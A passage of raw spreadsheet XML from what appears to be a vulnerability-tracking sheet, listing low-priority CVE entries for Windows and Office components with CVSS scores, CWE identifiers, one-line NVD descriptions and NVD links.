r="K186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67" s="5" t="inlineStr" /><c r="M1867" s="5" t="inlineStr" /><c r="N1867" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1867" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1867" s="5" t="inlineStr" /><c r="Q1867" s="5" t="inlineStr"><is><t>CWE-552</t></is></c><c r="R1867" s="5" t="inlineStr"><is><t>Files or directories accessible to external parties in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.</t></is></c><c r="S1867" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68831</t></is></c></row><row r="1868"><c r="A1868" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1868" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1868" s="5" t="inlineStr"><is><t>CVE-2026-68842</t></is></c><c r="D1868" s="5" t="n"><v>5.5</v></c><c r="E1868" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1868" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1868" s="5" t="inlineStr" /><c r="H1868" s="5" t="n"><v>0.004</v></c><c r="I1868" s="5" t="inlineStr" /><c r="J1868" s="5" t="inlineStr" /><c r="K1868" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1868" s="5" t="inlineStr" /><c r="M1868" s="5" t="inlineStr" /><c r="N1868" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1868" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1868" s="5" t="inlineStr" /><c r="Q1868" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="R1868" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t></is></c><c r="S1868" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68842</t></is></c></row><row r="1869"><c r="A1869" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1869" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1869" s="5" t="inlineStr"><is><t>CVE-2026-68843</t></is></c><c r="D1869" s="5" t="n"><v>5.5</v></c><c r="E1869" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1869" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1869" s="5" t="inlineStr" /><c r="H1869" s="5" t="n"><v>0.003</v></c><c r="I1869" s="5" t="inlineStr" /><c r="J1869" s="5" t="inlineStr" /><c r="K1869" s="5" t="inlineStr" /><c r="L1869" s="5" t="inlineStr" /><c r="M1869" s="5" t="inlineStr" /><c r="N1869" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1869" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1869" s="5" t="inlineStr" /><c r="Q1869" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1869" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an authorized attacker to disclose information locally.</t></is></c><c r="S1869" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68843</t></is></c></row><row r="1870"><c r="A1870" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1870" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1870" s="5" t="inlineStr"><is><t>CVE-2026-68851</t></is></c><c r="D1870" s="5" t="n"><v>5.5</v></c><c r="E1870" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1870" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1870" s="5" t="inlineStr" /><c r="H1870" s="5" t="n"><v>0.003</v></c><c r="I1870" s="5" t="inlineStr" /><c r="J1870" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K187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70" s="5" t="inlineStr" /><c r="M1870" s="5" t="inlineStr" /><c r="N1870" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1870" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1870" s="5" t="inlineStr" /><c r="Q1870" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1870" s="5" t="inlineStr"><is><t>Buffer over-read in Windows NTFS allows an authorized attacker to disclose information locally.</t></is></c><c r="S1870" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68851</t></is></c></row><row r="1871"><c r="A1871" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1871" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1871" s="5" t="inlineStr"><is><t>CVE-2026-68852</t></is></c><c r="D1871" s="5" t="n"><v>5.5</v></c><c r="E1871" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1871" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1871" s="5" t="inlineStr" /><c r="H1871" s="5" t="n"><v>0.003</v></c><c r="I1871" s="5" t="inlineStr" /><c r="J1871" s="5" t="inlineStr" /><c r="K1871" s="5" t="inlineStr" /><c r="L1871" s="5" t="inlineStr" /><c r="M1871" s="5" t="inlineStr" /><c r="N1871" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1871" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1871" s="5" t="inlineStr" /><c r="Q1871" s="5" t="inlineStr"><is><t>CWE-200, CWE-908</t></is></c><c r="R1871" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Account allows an authorized attacker to disclose information locally.</t></is></c><c r="S1871" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68852</t></is></c></row><row r="1872"><c r="A1872" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1872" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1872" s="5" t="inlineStr"><is><t>CVE-2026-68873</t></is></c><c r="D1872" s="5" t="n"><v>5.5</v></c><c r="E1872" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1872" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1872" s="5" t="inlineStr" /><c r="H1872" s="5" t="n"><v>0.005</v></c><c r="I1872" s="5" t="inlineStr" /><c r="J1872" s="5" t="inlineStr" /><c r="K1872" s="5" t="inlineStr" /><c r="L1872" s="5" t="inlineStr" /><c r="M1872" s="5" t="inlineStr" /><c r="N1872" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1872" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1872" s="5" t="inlineStr" /><c r="Q1872" s="5" t="inlineStr"><is><t>CWE-532, CWE-908</t></is></c><c r="R1872" s="5" t="inlineStr"><is><t>Insertion of sensitive information into log file in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information locally.</t></is></c><c r="S1872" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68873</t></is></c></row><row r="1873"><c r="A1873" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1873" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1873" s="5" t="inlineStr"><is><t>CVE-2026-68881</t></is></c><c r="D1873" s="5" t="n"><v>5.5</v></c><c r="E1873" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1873" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1873" s="5" t="inlineStr" /><c r="H1873" s="5" t="n"><v>0.003</v></c><c r="I1873" s="5" t="inlineStr" /><c r="J1873" s="5" t="inlineStr" /><c r="K1873" s="5" t="inlineStr" /><c r="L1873" s="5" t="inlineStr" /><c r="M1873" s="5" t="inlineStr" /><c r="N1873" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1873" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1873" s="5" t="inlineStr" /><c r="Q1873" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1873" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="S1873" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68881</t></is></c></row><row r="1874"><c r="A1874" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1874" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1874" s="5" t="inlineStr"><is><t>CVE-2026-68886</t></is></c><c r="D1874" s="5" t="n"><v>5.5</v></c><c r="E1874" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1874" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1874" s="5" t="inlineStr" /><c r="H1874" s="5" t="n"><v>0.005</v></c><c r="I1874" s="5" t="inlineStr" /><c r="J1874" s="5" t="inlineStr" /><c r="K1874" s="5" t="inlineStr" /><c r="L1874" s="5" t="inlineStr" /><c r="M1874" s="5" t="inlineStr" /><c r="N1874" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1874" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1874" s="5" t="inlineStr" /><c r="Q1874" s="5" t="inlineStr"><is><t>CWE-209, CWE-416</t></is></c><c r="R1874" s="5" t="inlineStr"><is><t>Use after free in Windows Network Connection Broker allows an authorized attacker to disclose information locally.</t></is></c><c r="S1874" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68886</t></is></c></row><row r="1875"><c r="A1875" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1875" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1875" s="5" t="inlineStr"><is><t>CVE-2026-68895</t></is></c><c r="D1875" s="5" t="n"><v>5.5</v></c><c r="E1875" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1875" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1875" s="5" t="inlineStr" /><c r="H1875" s="5" t="n"><v>0.003</v></c><c r="I1875" s="5" t="inlineStr" /><c r="J1875" s="5" t="inlineStr" /><c r="K1875" s="5" t="inlineStr" /><c r="L1875" s="5" t="inlineStr" /><c r="M1875" s="5" t="inlineStr" /><c r="N1875" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1875" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1875" s="5" t="inlineStr" /><c r="Q1875" s="5" t="inlineStr"><is><t>CWE-197</t></is></c><c r="R1875" s="5" t="inlineStr"><is><t>Numeric truncation error in Internet Storage Name Service allows an authorized attacker to disclose information locally.</t></is></c><c r="S1875" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68895</t></is></c></row><row r="1876"><c r="A1876" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1876" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1876" s="5" t="inlineStr"><is><t>CVE-2026-69286</t></is></c><c r="D1876" s="5" t="n"><v>5.5</v></c><c r="E1876" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1876" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1876" s="5" t="inlineStr" /><c r="H1876" s="5" t="n"><v>0.004</v></c><c r="I1876" s="5" t="inlineStr" /><c r="J1876" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K187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76" s="5" t="inlineStr" /><c r="M1876" s="5" t="inlineStr" /><c r="N1876" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1876" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1876" s="5" t="inlineStr" /><c r="Q1876" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="R1876" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to disclose information locally.</t></is></c><c r="S1876" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69286</t></is></c></row><row r="1877"><c r="A1877" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1877" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1877" s="5" t="inlineStr"><is><t>CVE-2026-69288</t></is></c><c r="D1877" s="5" t="n"><v>5.5</v></c><c r="E1877" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1877" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1877" s="5" t="inlineStr" /><c r="H1877" s="5" t="n"><v>0.003</v></c><c r="I1877" s="5" t="inlineStr" /><c r="J1877" s="5" t="inlineStr" /><c r="K1877" s="5" t="inlineStr" /><c r="L1877" s="5" t="inlineStr" /><c r="M1877" s="5" t="inlineStr" /><c r="N1877" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1877" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1877" s="5" t="inlineStr" /><c r="Q1877" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1877" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows GDI+ allows an authorized attacker to disclose information locally.</t></is></c><c r="S1877" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69288</t></is></c></row><row r="1878"><c r="A1878" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1878" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1878" s="5" t="inlineStr"><is><t>CVE-2026-69294</t></is></c><c r="D1878" s="5" t="n"><v>5.5</v></c><c r="E1878" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1878" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1878" s="5" t="inlineStr" /><c r="H1878" s="5" t="n"><v>0.003</v></c><c r="I1878" s="5" t="inlineStr" /><c r="J1878" s="5" t="inlineStr" /><c r="K1878" s="5" t="inlineStr" /><c r="L1878" s="5" t="inlineStr" /><c r="M1878" s="5" t="inlineStr" /><c r="N1878" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1878" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1878" s="5" t="inlineStr" /><c r="Q1878" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="R1878" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Microsoft COM for Windows allows an authorized attacker to disclose information locally.</t></is></c><c r="S1878" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69294</t></is></c></row><row r="1879"><c r="A1879" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1879" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1879" s="5" t="inlineStr"><is><t>CVE-2026-69303</t></is></c><c r="D1879" s="5" t="n"><v>5.5</v></c><c r="E1879" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1879" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1879" s="5" t="inlineStr" /><c r="H1879" s="5" t="n"><v>0.004</v></c><c r="I1879" s="5" t="inlineStr" /><c r="J1879" s="5" t="inlineStr" /><c r="K1879" s="5" t="inlineStr" /><c r="L1879" s="5" t="inlineStr" /><c r="M1879" s="5" t="inlineStr" /><c r="N1879" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1879" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1879" s="5" t="inlineStr" /><c r="Q1879" s="5" t="inlineStr"><is><t>CWE-125, CWE-191</t></is></c><c r="R1879" s="5" t="inlineStr"><is><t>Out-of-bounds read in Push Message Routing Service allows an authorized attacker to disclose information locally.</t></is></c><c r="S1879" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69303</t></is></c></row><row r="1880"><c r="A1880" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1880" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1880" s="5" t="inlineStr"><is><t>CVE-2026-69308</t></is></c><c r="D1880" s="5" t="n"><v>5.5</v></c><c r="E1880" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1880" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1880" s="5" t="inlineStr" /><c r="H1880" s="5" t="n"><v>0.004</v></c><c r="I1880" s="5" t="inlineStr" /><c r="J1880" s="5" t="inlineStr" /><c r="K1880" s="5" t="inlineStr" /><c r="L1880" s="5" t="inlineStr" /><c r="M1880" s="5" t="inlineStr" /><c r="N1880" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1880" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1880" s="5" t="inlineStr" /><c r="Q1880" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="R1880" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="S1880" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69308</t></is></c></row><row r="1881"><c r="A1881" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1881" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1881" s="5" t="inlineStr"><is><t>CVE-2026-69315</t></is></c><c r="D1881" s="5" t="n"><v>5.5</v></c><c r="E1881" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1881" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1881" s="5" t="inlineStr" /><c r="H1881" s="5" t="n"><v>0.005</v></c><c r="I1881" s="5" t="inlineStr" /><c r="J1881" s="5" t="inlineStr" /><c r="K1881" s="5" t="inlineStr" /><c r="L1881" s="5" t="inlineStr" /><c r="M1881" s="5" t="inlineStr" /><c r="N1881" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1881" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1881" s="5" t="inlineStr" /><c r="Q1881" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="R1881" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows License Manager allows an authorized attacker to disclose information locally.</t></is></c><c r="S1881" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69315</t></is></c></row><row r="1882"><c r="A1882" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1882" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1882" s="5" t="inlineStr"><is><t>CVE-2026-69318</t></is></c><c r="D1882" s="5" t="n"><v>5.5</v></c><c r="E1882" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1882" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1882" s="5" t="inlineStr" /><c r="H1882" s="5" t="n"><v>0.004</v></c><c r="I1882" s="5" t="inlineStr" /><c r="J1882" s="5" t="inlineStr" /><c r="K1882" s="5" t="inlineStr" /><c r="L1882" s="5" t="inlineStr" /><c r="M1882" s="5" t="inlineStr" /><c r="N1882" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1882" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1882" s="5" t="inlineStr" /><c r="Q1882" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1882" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Imaging Component allows an authorized attacker to disclose information locally.</t></is></c><c r="S1882" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69318</t></is></c></row><row r="1883"><c r="A1883" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1883" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1883" s="5" t="inlineStr"><is><t>CVE-2026-69321</t></is></c><c r="D1883" s="5" t="n"><v>5.5</v></c><c r="E1883" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1883" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1883" s="5" t="inlineStr" /><c r="H1883" s="5" t="n"><v>0.003</v></c><c r="I1883" s="5" t="inlineStr" /><c r="J1883" s="5" t="inlineStr" /><c r="K1883" s="5" t="inlineStr" /><c r="L1883" s="5" t="inlineStr" /><c r="M1883" s="5" t="inlineStr" /><c r="N1883" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1883" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1883" s="5" t="inlineStr" /><c r="Q1883" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R1883" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Power Dependency Coordinator allows an authorized attacker to perform tampering locally.</t></is></c><c r="S1883" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69321</t></is></c></row><row r="1884"><c r="A1884" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1884" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1884" s="5" t="inlineStr"><is><t>CVE-2026-69339</t></is></c><c r="D1884" s="5" t="n"><v>5.5</v></c><c r="E1884" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1884" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1884" s="5" t="inlineStr" /><c r="H1884" s="5" t="n"><v>0.005</v></c><c r="I1884" s="5" t="inlineStr" /><c r="J1884" s="5" t="inlineStr" /><c r="K1884" s="5" t="inlineStr" /><c r="L1884" s="5" t="inlineStr" /><c r="M1884" s="5" t="inlineStr" /><c r="N1884" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1884" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1884" s="5" t="inlineStr" /><c r="Q1884" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="R1884" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t></is></c><c r="S1884" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69339</t></is></c></row><row r="1885"><c r="A1885" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1885" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1885" s="5" t="inlineStr"><is><t>CVE-2026-69343</t></is></c><c r="D1885" s="5" t="n"><v>5.5</v></c><c r="E1885" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1885" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1885" s="5" t="inlineStr" /><c r="H1885" s="5" t="n"><v>0.004</v></c><c r="I1885" s="5" t="inlineStr" /><c r="J1885" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K188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85" s="5" t="inlineStr" /><c r="M1885" s="5" t="inlineStr" /><c r="N1885" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1885" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1885" s="5" t="inlineStr" /><c r="Q1885" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1885" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t></is></c><c r="S1885" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69343</t></is></c></row><row r="1886"><c r="A1886" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1886" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1886" s="5" t="inlineStr"><is><t>CVE-2026-69344</t></is></c><c r="D1886" s="5" t="n"><v>5.5</v></c><c r="E1886" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1886" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1886" s="5" t="inlineStr" /><c r="H1886" s="5" t="n"><v>0.004</v></c><c r="I1886" s="5" t="inlineStr" /><c r="J1886" s="5" t="inlineStr" /><c r="K1886" s="5" t="inlineStr" /><c r="L1886" s="5" t="inlineStr" /><c r="M1886" s="5" t="inlineStr" /><c r="N1886" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1886" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1886" s="5" t="inlineStr" /><c r="Q1886" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1886" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Print Spooler Components allows an authorized attacker to disclose information locally.</t></is></c><c r="S1886" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69344</t></is></c></row><row r="1887"><c r="A1887" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1887" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1887" s="5" t="inlineStr"><is><t>CVE-2026-69345</t></is></c><c r="D1887" s="5" t="n"><v>5.5</v></c><c r="E1887" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1887" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1887" s="5" t="inlineStr" /><c r="H1887" s="5" t="n"><v>0.004</v></c><c r="I1887" s="5" t="inlineStr" /><c r="J1887" s="5" t="inlineStr" /><c r="K1887" s="5" t="inlineStr" /><c r="L1887" s="5" t="inlineStr" /><c r="M1887" s="5" t="inlineStr" /><c r="N1887" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1887" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1887" s="5" t="inlineStr" /><c r="Q1887" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1887" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="S1887" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69345</t></is></c></row><row r="1888"><c r="A1888" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1888" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1888" s="5" t="inlineStr"><is><t>CVE-2026-69351</t></is></c><c r="D1888" s="5" t="n"><v>5.5</v></c><c r="E1888" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1888" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1888" s="5" t="inlineStr" /><c r="H1888" s="5" t="n"><v>0.005</v></c><c r="I1888" s="5" t="inlineStr" /><c r="J1888" s="5" t="inlineStr" /><c r="K1888" s="5" t="inlineStr" /><c r="L1888" s="5" t="inlineStr" /><c r="M1888" s="5" t="inlineStr" /><c r="N1888" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1888" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1888" s="5" t="inlineStr" /><c r="Q1888" s="5" t="inlineStr"><is><t>CWE-359</t></is></c><c r="R1888" s="5" t="inlineStr"><is><t>Exposure of private personal information to an unauthorized actor in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t></is></c><c r="S1888" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69351</t></is></c></row><row r="1889"><c r="A1889" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1889" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1889" s="5" t="inlineStr"><is><t>CVE-2026-69353</t></is></c><c r="D1889" s="5" t="n"><v>5.5</v></c><c r="E1889" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1889" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1889" s="5" t="inlineStr" /><c r="H1889" s="5" t="n"><v>0.004</v></c><c r="I1889" s="5" t="inlineStr" /><c r="J1889" s="5" t="inlineStr" /><c r="K1889" s="5" t="inlineStr" /><c r="L1889" s="5" t="inlineStr" /><c r="M1889" s="5" t="inlineStr" /><c r="N1889" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1889" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1889" s="5" t="inlineStr" /><c r="Q1889" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1889" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Text Shaping allows an authorized attacker to disclose information locally.</t></is></c><c r="S1889" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69353</t></is></c></row><row r="1890"><c r="A1890" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1890" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1890" s="5" t="inlineStr"><is><t>CVE-2026-69367</t></is></c><c r="D1890" s="5" t="n"><v>5.5</v></c><c r="E1890" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1890" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1890" s="5" t="inlineStr" /><c r="H1890" s="5" t="n"><v>0.004</v></c><c r="I1890" s="5" t="inlineStr" /><c r="J1890" s="5" t="inlineStr" /><c r="K1890" s="5" t="inlineStr" /><c r="L1890" s="5" t="inlineStr" /><c r="M1890" s="5" t="inlineStr" /><c r="N1890" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1890" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1890" s="5" t="inlineStr" /><c r="Q1890" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1890" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="S1890" s="6" 